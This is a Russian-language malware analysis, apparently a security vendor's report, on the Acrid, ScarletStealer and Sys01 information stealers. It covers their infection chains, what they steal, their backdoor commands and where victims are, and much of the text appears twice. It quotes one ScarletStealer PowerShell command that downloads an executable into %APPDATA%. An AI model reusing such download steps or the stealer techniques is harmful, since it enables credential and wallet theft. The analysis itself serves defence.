Тенденция к появлению новых и новых версий этого вредоносного ПО сохраняется: за последние месяцы мы подготовили еще несколько закрытых отчетов.
В них мы описали, в частности, совсем новые стилеры Acrid и ScarletStealer, а также стилер Sys01, получивший значительное обновление с момента выхода .
Реализация техники Heaven’s Gate в стилере Acrid
Функциональность стилера обычна для вредоносного ПО такого типа:
Уровень сложности стилера можно оценить как средний. В нем есть некоторые изощренные детали, вроде шифрования строк, но нет ничего инновационного.
Это довольно необычный стилер: большая часть его функциональности содержится в других бинарных файлах (приложениях и расширениях Chrome), которые он загружает. Если быть более точным: когда ScarletStealer запускается, он ищет криптовалюты и криптокошельки, проверяя определенные пути к папкам (например, %APPDATA%\Roaming\Exodus). Если стилер что-то нашел, он начинает загружать дополнительные исполняемые файлы с помощью следующей команды PowerShell:
Среди загружаемых им бинарных файлов — metaver_.exe (используется для кражи содержимого из расширений Chrome), meta.exe (модифицирует ярлык Chrome так, чтобы он запускался с вредоносным расширением) и другие. Большинство исполняемых файлов ScarletStealer имеют цифровую подпись.
Функция перехвата данных Metamask
Стилер очень слабо развит в плане функциональности и содержит множество ошибок, недоработок и избыточного кода. Например, он пытается закрепиться в системе, создавая раздел реестра для автозапуска. Этот раздел реестра содержит путь к файлу Runtimebroker_.exe, однако ни в одном из файлов стилера мы не нашли кода, в котором бы упоминался хоть один исполняемый файл с таким именем.
Поэтому довольно странно, что этот стилер распространяется через длинную цепочку загрузчиков (последний из которых — это Penguish) и подписан цифровым сертификатом. Можно было бы ожидать, что все эти усилия увенчаются загрузкой чего-то более продвинутого, чем ScarletStealer.
Жертвы этого стилера в основном находятся в Бразилии, Турции, Индонезии, Алжире, Египте, Индии, Вьетнаме, США, Южной Африке и Португалии.
Единственное, что не изменилось в новой версии стилера, — это вектор заражения. Как и раньше, пользователей обманом побуждают загрузить вредоносный ZIP-архив, замаскированный под видео для взрослых, через страницу на Facebook:
Реклама вредоносного ZIP-архива на взломанной странице Facebook
Архив содержит легитимный бинарный файл (в данном случае WdSyncservice.exe, переименованный в PlayVideoFull.exe), который загружает вредоносную библиотеку DLL с именем WDSync.dll. DLL открывает видео для взрослых и попутно запускает следующую полезную нагрузку, которая представляет собой вредоносный PHP-файл, закодированный с помощью .
Этот PHP-файл, в свою очередь, вызывает скрипт install.bat, а тот выполняет команду PowerShell, чтобы запустить следующий этап. Он называется runalayer и запускает то, что, видимо, и является финальной полезной нагрузкой, называемой Newb.
Однако между последней версией стилера и предыдущими публично раскрытыми версиями есть разница, которая заключается в разделенной функциональности. Стилер в его нынешнем виде (Newb) содержит функциональность для кражи данных, связанных с Facebook, и для отправки на командный сервер злоумышленников украденных данных браузера, которые размещены и организованы в определенной структуре каталога. Он также имеет функции бэкдора и может выполнять, среди прочих, следующие команды.
Но код, который, собственно, собирает данные браузера, чтобы Newb отправил их на командный сервер злоумышленников, обнаружился в другом образце — imageclass. Изучив код бэкдора Newb, мы с большой долей уверенности считаем, что imageclass попадает в систему через него, хотя не можем определить это достоверно.
В исходном ZIP-архиве содержится еще один вредоносный PHP-файл — include.php. Этот файл имеет схожую с Newb функциональность бэкдора и принимает многие из его команды и в том же формате.
Жертвы этой кампании были найдены по всему миру, но большинство из них — в Алжире (чуть более 15%). Скорее всего, это связано с вектором заражения: он может быть сильно локализованным. Мы также заметили, что разработчики вредоносной программы отдают предпочтение доменам верхнего уровня .top.
Стилеры опасны своими последствиями. Эти программы похищают пароли и другую конфиденциальную информацию, которая впоследствии может быть использована в других вредоносных целях, а это приводит как минимум к большим финансовым потерям. Чтобы защитить себя от стилеров и других угроз, важно соблюдать несколько основных правил кибергигиены: всегда устанавливайте последние патчи безопасности на свое программное обеспечение, не скачивайте файлы из сомнительных источников и не открывайте вложения в сомнительных письмах. Для большей уверенности можно установить защитное решение, которое отслеживает события на вашем компьютере.
ScarletStealer
Sys01
В них мы описали, в частности, совсем новые стилеры Acrid и ScarletStealer, а также стилер Sys01, получивший значительное обновление с момента выхода .
Acrid
Acrid — это новый стилер, обнаруженный в декабре прошлого года. Несмотря на название он не имеет ничего общего со . Acrid написан на C++ для 32-разрядных систем, хотя в наши дни большинство систем 64-разрядные. При внимательном изучении причина компиляции для 32-разрядной среды становится ясна: разработчик решил использовать технику Heaven’s Gate. Она позволяет 32-разрядным приложениям получать доступ к 64-разрядной среде, чтобы обойти определенные меры безопасности.Реализация техники Heaven’s Gate в стилере Acrid
Функциональность стилера обычна для вредоносного ПО такого типа:
- кража данных браузера (файлы cookie, пароли, другие данные для входа в систему, данные банковских карт и так далее);
- кража локальных криптовалютных кошельков;
- кража файлов с определенными именами (wallet.dat, password.docx и так далее);
- кража учетных данных из установленных приложений (FTP-менеджеры, мессенджеры и другие).
Уровень сложности стилера можно оценить как средний. В нем есть некоторые изощренные детали, вроде шифрования строк, но нет ничего инновационного.
ScarletStealer
В январе прошлого года мы изучали загрузчик, который мы назвали Penguish (и подробно описали в закрытом отчете). Одной из полезных нагрузок, которые он загружал, был ранее неизвестный стилер. Его мы назвали ScarletStealer.Это довольно необычный стилер: большая часть его функциональности содержится в других бинарных файлах (приложениях и расширениях Chrome), которые он загружает. Если быть более точным: когда ScarletStealer запускается, он ищет криптовалюты и криптокошельки, проверяя определенные пути к папкам (например, %APPDATA%\Roaming\Exodus). Если стилер что-то нашел, он начинает загружать дополнительные исполняемые файлы с помощью следующей команды PowerShell:
| 1 2 | powershell.exe -Command "Invoke-WebRequest -Uri 'https://.........exe' - OutFile $env:APPDATA\\.........exe |
Среди загружаемых им бинарных файлов — metaver_.exe (используется для кражи содержимого из расширений Chrome), meta.exe (модифицирует ярлык Chrome так, чтобы он запускался с вредоносным расширением) и другие. Большинство исполняемых файлов ScarletStealer имеют цифровую подпись.
Функция перехвата данных Metamask
Стилер очень слабо развит в плане функциональности и содержит множество ошибок, недоработок и избыточного кода. Например, он пытается закрепиться в системе, создавая раздел реестра для автозапуска. Этот раздел реестра содержит путь к файлу Runtimebroker_.exe, однако ни в одном из файлов стилера мы не нашли кода, в котором бы упоминался хоть один исполняемый файл с таким именем.
Поэтому довольно странно, что этот стилер распространяется через длинную цепочку загрузчиков (последний из которых — это Penguish) и подписан цифровым сертификатом. Можно было бы ожидать, что все эти усилия увенчаются загрузкой чего-то более продвинутого, чем ScarletStealer.
Жертвы этого стилера в основном находятся в Бразилии, Турции, Индонезии, Алжире, Египте, Индии, Вьетнаме, США, Южной Африке и Португалии.
Sys01
SYS01 (другие названия — Album Stealer, S1deload Stealer) — относительно малоизвестный стилер, существующий как минимум с 2022 года. Его уже описывали , и . В их отчетах можно проследить эволюцию от стилера на C# до стилера на PHP. Когда эту кампанию начали изучать мы, то заметили сочетание этих двух полезных нагрузок — на C# и на PHP.Единственное, что не изменилось в новой версии стилера, — это вектор заражения. Как и раньше, пользователей обманом побуждают загрузить вредоносный ZIP-архив, замаскированный под видео для взрослых, через страницу на Facebook:
Реклама вредоносного ZIP-архива на взломанной странице Facebook
Архив содержит легитимный бинарный файл (в данном случае WdSyncservice.exe, переименованный в PlayVideoFull.exe), который загружает вредоносную библиотеку DLL с именем WDSync.dll. DLL открывает видео для взрослых и попутно запускает следующую полезную нагрузку, которая представляет собой вредоносный PHP-файл, закодированный с помощью .
Этот PHP-файл, в свою очередь, вызывает скрипт install.bat, а тот выполняет команду PowerShell, чтобы запустить следующий этап. Он называется runalayer и запускает то, что, видимо, и является финальной полезной нагрузкой, называемой Newb.
Однако между последней версией стилера и предыдущими публично раскрытыми версиями есть разница, которая заключается в разделенной функциональности. Стилер в его нынешнем виде (Newb) содержит функциональность для кражи данных, связанных с Facebook, и для отправки на командный сервер злоумышленников украденных данных браузера, которые размещены и организованы в определенной структуре каталога. Он также имеет функции бэкдора и может выполнять, среди прочих, следующие команды.
| Команда | Описание |
| dll | Загрузить файл, завершить все указанные процессы и запустить новый процесс с помощью PowerShell (команда расшифровывает, распаковывает и запускает указанный файл). Процедура PowerShell работает так же, как и в прошлых наблюдавшихся версиях. |
| cmd | Завершить процессы из указанного списка и запустить новый процесс. |
| dls | Загрузить файл, завершить все указанные процессы и запустить новый указанный процесс. |
Но код, который, собственно, собирает данные браузера, чтобы Newb отправил их на командный сервер злоумышленников, обнаружился в другом образце — imageclass. Изучив код бэкдора Newb, мы с большой долей уверенности считаем, что imageclass попадает в систему через него, хотя не можем определить это достоверно.
В исходном ZIP-архиве содержится еще один вредоносный PHP-файл — include.php. Этот файл имеет схожую с Newb функциональность бэкдора и принимает многие из его команды и в том же формате.
Жертвы этой кампании были найдены по всему миру, но большинство из них — в Алжире (чуть более 15%). Скорее всего, это связано с вектором заражения: он может быть сильно локализованным. Мы также заметили, что разработчики вредоносной программы отдают предпочтение доменам верхнего уровня .top.
Заключение
Стилеры — это реальная и по-прежнему актуальная угроза. В этой статье мы рассмотрели эволюцию известного стилера, а также два совершенно новых стилера разных уровней сложности. Тот факт, что новые программы этого типа продолжают появляться, причем с разной сложностью и функциональностью, говорит о том, что на преступном рынке существует на них спрос.Стилеры опасны своими последствиями. Эти программы похищают пароли и другую конфиденциальную информацию, которая впоследствии может быть использована в других вредоносных целях, а это приводит как минимум к большим финансовым потерям. Чтобы защитить себя от стилеров и других угроз, важно соблюдать несколько основных правил кибергигиены: всегда устанавливайте последние патчи безопасности на свое программное обеспечение, не скачивайте файлы из сомнительных источников и не открывайте вложения в сомнительных письмах. Для большей уверенности можно установить защитное решение, которое отслеживает события на вашем компьютере.
Индикаторы компрометации
AcridScarletStealer
Sys01
